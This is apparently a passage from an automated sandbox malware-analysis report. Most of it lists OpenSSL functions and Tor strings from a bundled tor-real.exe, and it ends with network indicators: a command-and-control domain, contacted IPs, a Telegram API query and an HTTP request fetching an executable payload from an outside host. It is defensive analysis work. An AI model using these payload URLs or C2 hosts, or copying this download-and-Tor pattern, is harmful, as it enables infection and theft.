                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C190E74 BIO_write,BIO_write,BIO_write,BIO_write,i2d_ASN1_TYPE,CRYPTO_malloc,i2d_ASN1_TYPE,BIO_write,CRYPTO_free,CRYPTO_free,ERR_put_error,25_2_6C190E74
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C192E67 ASN1_STRING_copy,CRYPTO_free,CRYPTO_zalloc,memcpy,25_2_6C192E67
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AAE90 ASYNC_cleanup_thread,OPENSSL_init_crypto,25_2_6C1AAE90
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2AEEA0 OBJ_txt2obj,OBJ_sn2nid,OBJ_ln2nid,a2d_ASN1_OBJECT,ASN1_object_size,CRYPTO_malloc,ASN1_put_object,a2d_ASN1_OBJECT,d2i_ASN1_OBJECT,CRYPTO_free,__stack_chk_fail,OBJ_txt2nid,OBJ_sn2nid,OBJ_ln2nid,a2d_ASN1_OBJECT,ASN1_object_size,CRYPTO_malloc,ASN1_put_object,a2d_ASN1_OBJECT,d2i_ASN1_OBJECT,CRYPTO_free,OBJ_obj2nid,ASN1_OBJECT_free,OPENSSL_LH_retrieve,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,25_2_6C2AEEA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C19EEB0 ASN1_bn_print,BN_is_negative,BIO_indent,BN_is_zero,BN_num_bits,BIO_printf,BIO_printf,BN_num_bits,CRYPTO_malloc,BIO_printf,BN_bn2bin,ASN1_buf_print,CRYPTO_clear_free,25_2_6C19EEB0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AAED0 ASYNC_get_current_job,OPENSSL_init_crypto,CRYPTO_THREAD_get_local,25_2_6C1AAED0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1EEEE0 OPENSSL_LH_retrieve,__stack_chk_fail,OPENSSL_sk_push,OPENSSL_LH_insert,OPENSSL_sk_delete_ptr,CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C1EEEE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C30CF20 UI_free,OPENSSL_sk_pop_free,CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,25_2_6C30CF20
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1A4F04 OPENSSL_sk_num,OPENSSL_sk_free,CRYPTO_free,25_2_6C1A4F04
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AAF30 ASYNC_block_pause,OPENSSL_init_crypto,CRYPTO_THREAD_get_local,25_2_6C1AAF30
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1A4F5C OPENSSL_sk_num,OPENSSL_sk_free,CRYPTO_free,25_2_6C1A4F5C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C196F50 ASN1_STRING_copy,memcpy,strlen,CRYPTO_realloc,ERR_put_error,ERR_put_error,25_2_6C196F50
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C296F60 CRYPTO_free_ex_data,CRYPTO_THREAD_run_once,CRYPTO_THREAD_write_lock,OPENSSL_sk_num,OPENSSL_sk_value,CRYPTO_THREAD_unlock,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,CRYPTO_malloc,CRYPTO_THREAD_unlock,CRYPTO_THREAD_write_lock,OPENSSL_sk_value,CRYPTO_THREAD_unlock,OPENSSL_sk_num,OPENSSL_sk_value,CRYPTO_free,ERR_put_error,CRYPTO_THREAD_unlock,ERR_put_error,__stack_chk_fail,25_2_6C296F60
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AAF57 CRYPTO_THREAD_get_local,25_2_6C1AAF57
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C198F73 strlen,OPENSSL_sk_push,strlen,strlen,OPENSSL_sk_push,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,OPENSSL_sk_pop_free,25_2_6C198F73
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C30CFA0 UI_add_input_string,CRYPTO_malloc,OPENSSL_sk_push,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_new_null,CRYPTO_free,ERR_put_error,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C30CFA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1C6F89 ERR_put_error,CRYPTO_free,25_2_6C1C6F89
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C286FB0 EVP_ENCODE_CTX_free,CRYPTO_free,25_2_6C286FB0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AAF80 ASYNC_unblock_pause,OPENSSL_init_crypto,CRYPTO_THREAD_get_local,25_2_6C1AAF80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C286F80 EVP_ENCODE_CTX_new,CRYPTO_zalloc,25_2_6C286F80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2AAF80 CRYPTO_ofb128_encrypt,25_2_6C2AAF80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AAFA7 CRYPTO_THREAD_get_local,25_2_6C1AAFA7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C230FE0 EC_POINT_new,CRYPTO_zalloc,ERR_put_error,CRYPTO_free,ERR_put_error,ERR_put_error,25_2_6C230FE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C29EFF0 CRYPTO_free,25_2_6C29EFF0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1E8FC0 CMS_add0_recipient_password,ERR_put_error,X509_ALGOR_new,EVP_CIPHER_CTX_new,EVP_EncryptInit_ex,EVP_CIPHER_CTX_iv_length,RAND_bytes,EVP_EncryptInit_ex,ASN1_TYPE_new,EVP_CIPHER_param_to_asn1,EVP_CIPHER_CTX_cipher,EVP_CIPHER_type,OBJ_nid2obj,EVP_CIPHER_CTX_free,ASN1_item_new,ASN1_item_new,X509_ALGOR_free,X509_ALGOR_new,OBJ_nid2obj,ASN1_TYPE_new,X509_ALGOR_it,ASN1_item_pack,X509_ALGOR_free,PKCS5_pbkdf2_set,strlen,OPENSSL_sk_push,ERR_put_error,EVP_CIPHER_CTX_free,ASN1_item_free,ERR_put_error,ERR_put_error,EVP_CIPHER_CTX_free,X509_ALGOR_free,ERR_put_error,ERR_put_error,EVP_CIPHER_CTX_free,__stack_chk_fail,25_2_6C1E8FC0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1C6FE0 BN_BLINDING_free,BN_free,BN_free,BN_free,BN_free,CRYPTO_THREAD_lock_free,CRYPTO_free,25_2_6C1C6FE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1E4FE0 CMS_RecipientInfo_decrypt,ERR_put_error,OBJ_obj2nid,AES_set_decrypt_key,CRYPTO_malloc,AES_unwrap_key,OPENSSL_cleanse,EVP_PKEY_CTX_new,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_free,CRYPTO_free,ERR_put_error,OBJ_obj2nid,OBJ_nid2sn,EVP_get_cipherbyname,EVP_CIPHER_key_length,EVP_PKEY_CTX_ctrl,EVP_PKEY_decrypt,CRYPTO_malloc,EVP_PKEY_decrypt,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_put_error,CRYPTO_free,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,EVP_PKEY_CTX_free,ERR_put_error,ERR_put_error,__stack_chk_fail,25_2_6C1E4FE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C182FE7 AES_decrypt,25_2_6C182FE7
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1B281B CRYPTO_free,25_2_6C1B281B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C304820 CRYPTO_THREAD_lock_new,CRYPTO_zalloc,InitializeCriticalSectionAndSpinCount,CRYPTO_free,25_2_6C304820
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1A4808 ASN1_item_ex_i2d,CRYPTO_malloc,ASN1_item_ex_i2d,25_2_6C1A4808
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AA834 ERR_put_error,CRYPTO_free,25_2_6C1AA834
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1F8830 DES_cfb64_encrypt,DES_encrypt1,DES_encrypt1,__stack_chk_fail,DES_cfb_encrypt,DES_encrypt1,DES_encrypt1,__stack_chk_fail,25_2_6C1F8830
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18E828 ASN1_TYPE_free,ASN1_TYPE_new,ASN1_OBJECT_free,OBJ_nid2obj,CRYPTO_malloc,EVP_PKEY_size,CRYPTO_malloc,EVP_DigestInit_ex,EVP_DigestUpdate,ERR_put_error,EVP_MD_CTX_free,CRYPTO_clear_free,CRYPTO_clear_free,25_2_6C18E828
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C194856 CRYPTO_clear_free,EVP_MD_CTX_free,ERR_put_error,25_2_6C194856
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18E879 EVP_MD_CTX_free,CRYPTO_clear_free,CRYPTO_clear_free,EVP_SignFinal,CRYPTO_free,25_2_6C18E879
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C32A840 OPENSSL_sk_free,OPENSSL_sk_pop_free,X509_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,X509_policy_tree_free,25_2_6C32A840
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1B2868 CRYPTO_zalloc,ERR_put_error,25_2_6C1B2868
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D0860 BN_GENCB_free,CRYPTO_free,25_2_6C1D0860
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C3048B0 CRYPTO_THREAD_write_lock,EnterCriticalSection,25_2_6C3048B0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C198890 CRYPTO_strdup,CRYPTO_strdup,CRYPTO_malloc,OPENSSL_sk_push,CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C198890
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AA890 ASYNC_start_job,OPENSSL_init_crypto,CRYPTO_THREAD_get_local,ERR_put_error,CRYPTO_THREAD_get_local,CRYPTO_free,OPENSSL_sk_push,CRYPTO_THREAD_get_local,OPENSSL_sk_pop,CRYPTO_malloc,memcpy,SwitchToFiber,SwitchToFiber,CRYPTO_malloc,CRYPTO_THREAD_set_local,CRYPTO_free,ASYNC_init_thread,CRYPTO_THREAD_get_local,CRYPTO_zalloc,ERR_put_error,CreateFiber,CRYPTO_free,DeleteFiber,CRYPTO_free,CRYPTO_THREAD_get_local,CRYPTO_free,OPENSSL_sk_push,ERR_put_error,ERR_put_error,CRYPTO_THREAD_get_local,CRYPTO_free,OPENSSL_sk_push,25_2_6C1AA890
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2AE8B0 OBJ_obj2txt,BN_set_word,BN_lshift,BN_free,BN_add_word,BIO_snprintf,strlen,BN_new,OBJ_obj2nid,BN_bn2dec,strlen,OPENSSL_strlcpy,CRYPTO_free,OBJ_nid2ln,OPENSSL_strlcpy,strlen,OPENSSL_strlcpy,OBJ_nid2sn,BN_sub_word,BN_free,__stack_chk_fail,25_2_6C2AE8B0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1F4880 o2i_SCT,SCT_new,CRYPTO_memdup,SCT_free,ERR_put_error,SCT_free,CRYPTO_memdup,CRYPTO_memdup,ERR_put_error,SCT_free,__stack_chk_fail,25_2_6C1F4880
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C304890 CRYPTO_THREAD_read_lock,EnterCriticalSection,25_2_6C304890
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1948B3 CRYPTO_clear_free,EVP_MD_CTX_free,ERR_put_error,25_2_6C1948B3
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C3048F0 CRYPTO_THREAD_lock_free,DeleteCriticalSection,CRYPTO_free,25_2_6C3048F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AA8C3 CRYPTO_THREAD_get_local,ERR_put_error,CRYPTO_THREAD_get_local,CRYPTO_free,OPENSSL_sk_push,25_2_6C1AA8C3
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D68C0 BN_bn2hex,BN_is_zero,CRYPTO_malloc,CRYPTO_strdup,ERR_put_error,25_2_6C1D68C0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C3048D0 CRYPTO_THREAD_unlock,LeaveCriticalSection,25_2_6C3048D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18A8F0 ASN1_STRING_set,ASN1_INTEGER_new,ASN1_STRING_set,ERR_put_error,ASN1_INTEGER_free,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,d2i_ASN1_UINTEGER,ASN1_get_object,ERR_put_error,ASN1_INTEGER_free,ASN1_INTEGER_new,ASN1_get_object,ERR_put_error,ERR_put_error,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_malloc,ERR_put_error,__stack_chk_fail,ASN1_INTEGER_get_int64,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,25_2_6C18A8F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1F28F0 CONF_get1_default_config_file,CRYPTO_strdup,X509_get_default_cert_area,strlen,CRYPTO_malloc,X509_get_default_cert_area,BIO_snprintf,25_2_6C1F28F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C304930 CRYPTO_THREAD_run_once,25_2_6C304930
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D091C CRYPTO_zalloc,memcpy,CRYPTO_clear_free,25_2_6C1D091C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C19A911 CONF_imodule_get_value,NCONF_get_section,OPENSSL_sk_num,OPENSSL_sk_value,strrchr,CRYPTO_malloc,memcpy,OBJ_create,CRYPTO_free,OPENSSL_sk_num,ERR_put_error,ERR_put_error,ERR_put_error,25_2_6C19A911
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D0900 CRYPTO_zalloc,memcpy,CRYPTO_clear_free,CRYPTO_secure_zalloc,CRYPTO_secure_clear_free,ERR_put_error,ERR_put_error,ERR_put_error,25_2_6C1D0900
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C272960 ERR_load_strings_const,CRYPTO_THREAD_run_once,CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,CRYPTO_THREAD_unlock,25_2_6C272960
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1BA954 BUF_MEM_free,CRYPTO_free,CRYPTO_free,25_2_6C1BA954
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C29A970 OPENSSL_thread_stop,CRYPTO_THREAD_get_local,CRYPTO_THREAD_set_local,CRYPTO_free,25_2_6C29A970
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1A8940 CRYPTO_THREAD_lock_free,CRYPTO_THREAD_lock_new,ERR_put_error,25_2_6C1A8940
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18E944 CRYPTO_malloc,EVP_PKEY_size,CRYPTO_malloc,EVP_DigestInit_ex,EVP_DigestUpdate,ERR_put_error,EVP_MD_CTX_free,CRYPTO_clear_free,CRYPTO_clear_free,ASN1_TYPE_free,ASN1_TYPE_new,ASN1_OBJECT_free,OBJ_nid2obj,ASN1_TYPE_free,25_2_6C18E944
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C3049B0 CRYPTO_THREAD_get_local,GetLastError,TlsGetValue,SetLastError,25_2_6C3049B0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1B6990 CRYPTO_free,CRYPTO_free,25_2_6C1B6990
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DC990 Camellia_decrypt,25_2_6C1DC990
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C304990 CRYPTO_THREAD_init_local,TlsAlloc,25_2_6C304990
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1F89B0 DES_cfb_encrypt,DES_encrypt1,25_2_6C1F89B0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C19A9AB CRYPTO_malloc,memcpy,OBJ_create,CRYPTO_free,OPENSSL_sk_num,25_2_6C19A9AB
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1989A4 CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C1989A4
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1F29A0 CONF_modules_load_file,NCONF_new,NCONF_load,CONF_modules_load,NCONF_free,ERR_peek_last_error,ERR_clear_error,CONF_get1_default_config_file,CRYPTO_free,25_2_6C1F29A0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C3049F0 CRYPTO_THREAD_set_local,TlsSetValue,25_2_6C3049F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D09DC CRYPTO_secure_clear_free,25_2_6C1D09DC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1A89D6 CRYPTO_THREAD_lock_new,ERR_put_error,25_2_6C1A89D6
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C27A9F0 EVP_MD_CTX_copy_ex,ENGINE_init,EVP_MD_CTX_reset,EVP_MD_CTX_clear_flags,memcpy,EVP_PKEY_CTX_dup,ERR_put_error,EVP_MD_CTX_set_flags,ERR_put_error,CRYPTO_malloc,EVP_MD_CTX_reset,ERR_put_error,25_2_6C27A9F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2AC9F0 CRYPTO_strdup,strlen,CRYPTO_malloc,strcpy,25_2_6C2AC9F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C3409D0 BN_bn2hex,strlen,CRYPTO_malloc,OPENSSL_strlcpy,OPENSSL_strlcat,CRYPTO_free,OPENSSL_strlcpy,OPENSSL_strlcat,ERR_put_error,CRYPTO_free,25_2_6C3409D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2909C0 EVP_PKEY_new,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_put_error,ERR_put_error,CRYPTO_free,25_2_6C2909C0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2A29C0 CRYPTO_cfb128_8_encrypt,__stack_chk_fail,25_2_6C2A29C0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1F69F0 CRYPTO_zalloc,ERR_put_error,25_2_6C1F69F0
                Source: tor-real.exe, 00000019.00000002.4506289259.0000000004247000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN RSA PUBLIC KEY-----memstr_f5bcfea9-4
                Source: yt7dW9nyJK.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 199.188.200.89:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2
                Source: yt7dW9nyJK.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 0000000E.00000003.2282783311.0000000002B85000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: WINLOA~1.PDBwinload_prod.pdbCD9E3BB-4D03-46BD-8615-75A902267162.logg6 source: cmd.exe, 0000000E.00000003.2282783311.0000000002B85000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 0000000E.00000003.2282653067.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h19_2_06290158
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then jmp 096774BCh19_2_096759B0
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h19_2_096759B0
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then jmp 0967B584h19_2_0967B0E8
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then mov ecx, dword ptr [ebp-60h]19_2_09672230
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then jmp 096786C1h19_2_096784C0
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then mov ecx, dword ptr [ebp-60h]19_2_0967222E
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h19_2_0967AAE9
                Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exeCode function: 4x nop then jmp 096774BCh19_2_09676F56
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]25_2_6C190E40

                Networking

                Source: Malware configuration extractorURLs: securefirewall.portmap.io
                Source: tor-real.exe, 00000019.00000000.2396954468.00000000003B6000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: To debug, this may helpWhat was %p doing in pending_entry_connections in %s?Closing one-hop stream to '%s/%s' because the OR conn just failed.entry_conn->socks_requestGiving up on enclave exit '%s' for destination %s.At %s:%d: %p was unexpectedly in circuit_wait. Closing.Application request to port %d: this port is commonly used for unencrypted protocols. Please make sure you don't send anything you would mind the rest of the Internet reading!%sREJECTWARNDANGEROUS_PORT PORT=%d RESULT=%sPort %d listed in RejectPlaintextPorts. Closing.exitoniononion Invalid %shostname %s; rejectingClient asked for %s:%d.exitThe ".exit" notation is disabled in Tor due to security risks.SOCKS_BAD_HOSTNAME HOSTNAME=%sUnable to automap address %sAutomapping %s to %sREVERSE[%s]Missing mapping for virtual address '%s'. Refusing.Onion address %s requested from a port with .onion disabledResolve requests to hidden services not allowed. Failing.Attachstream to a circuit is not supported for .onion addresses currently. Failing.Using previously configured client authorization for hidden service request.Got a hidden service request for ID '%s'addresstype == ONION_V3_HOSTNAMEfailed to parse hs addressNot fetching.Refetching.usableunusableFound %s descriptor in cache for %s. %s.Invalid service name '%s'No descriptor found in our cache for %s. Fetching.Unknown cache lookup error %dedge_conn->rend_dataedge_conn->hs_identDescriptor is here. Great.Stale automapped address for '%s.exit'. Refusing.Address '%s.exit', with impossible source for the .exit part. Refusing.!automapMalformed exit address '%s.exit'. Refusing.Unrecognized relay in exit address '%s.exit'. Refusing.Excluded relay in exit address '%s.exit'. Refusing.Destination '%s' seems to be an invalid hostname. 
Failing.Refusing to connect to non-hidden-service hostname or IP address %s because Port has OnionTrafficOnly set (or NoDNSRequest, NoIPv4Traffic, and NoIPv6Traffic).Refusing to connect to hostname %s because Port has NoDNSRequest set.Refusing to connect to IPv4 address %s because Port has NoIPv4Traffic set.Refusing to connect to IPv6 address %s because Port has NoIPv6Traffic set.Application asked to connect to port 0. Refusing.Rejecting request for anonymous connection to private address %s on a TransPort or NATDPort. Possible loop in your NAT rules?%sRejecting SOCKS request for anonymous connection to private address %s.%sRejecting SOCKS request for an IP address family that this listener does not support.Rejecting SOCKS4 request for an IPv6 address.Rejecting SOCKS4 request on a listener with no IPv4 traffic supported.Redirecting address %s to exit at enclave router %saddresstype == ONION_V2_HOSTNAME || addresstype == ONION_V3_HOSTNAMEWarning! You've just connected to a v2 onion address. These addresses are deprecated for security reasons, and are no longer supported in Tor. Please encourage the site operator to upgrade. For more information see https://blog.torproject.org/v2-deprecation-timelineCalled connection_a
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 4.2.yt7dW9nyJK.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 193.161.193.99:31510
                Source: global trafficTCP traffic: 192.168.2.5:49725 -> 140.78.100.15:8443
                Source: global trafficTCP traffic: 192.168.2.5:49726 -> 185.119.118.59:8080
                Source: global trafficTCP traffic: 192.168.2.5:49729 -> 193.142.146.239:9001
                Source: global trafficTCP traffic: 192.168.2.5:49730 -> 95.217.36.40:9993
                Source: global trafficHTTP traffic detected: GET /uploaded/JxTcJM84e3NbGP4mm.exe HTTP/1.1Host: libyaalahrar.coConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip HTTP/1.1Host: github.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/146779096/943f13f9-3eb9-4042-8722-d95f026c8b09?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240723%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240723T134702Z&X-Amz-Expires=300&X-Amz-Signature=684cb43c3b728dcd5e6fa405bf9e25ff74f8774c26110905339a58889403f8fe&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=146779096&response-content-disposition=attachment%3B%20filename%3Dtor-expert-bundle-v0.4.5.10.zip&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: Keep-Alive
